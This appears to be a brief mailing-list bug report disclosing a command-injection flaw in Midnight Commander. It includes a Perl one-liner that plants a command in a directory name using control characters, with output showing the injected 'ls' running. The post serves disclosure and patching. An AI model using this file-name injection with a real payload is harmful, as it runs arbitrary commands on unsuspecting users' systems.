Today, I read in the paper version of the German linux magazin about a
mc bug that was discovered end of november.
Reference is http://www.securityfocus.com/vdb/?id=2016
An attacker can create a directory name containing 0x03 0x014 followd
by some command, and mc will execute this command, if someone enters
this directory. mc 4.5.40 - 4.5.51 is affected.
I just tested this, and it does work :-(
$ perl -e 'mkdir "test" . chr(0x03) . chr(0x14) . "ls" '
$ mc
Warning: Couldn't change to /tmp/testbsls.
^H$ ls
AcroVcaY4I magicC3FiTD mc15802-12931 reportbug.19514.1~ test??ls
flash.txt magicdAdYh2 mc5602-11965 ssh-XX6aFrA8 tleds.pid
lost+found martinb orbit-martinb ssh-XX7x314g uKuvkK
A patch is greatly appreciated.
Ciao,
Martin
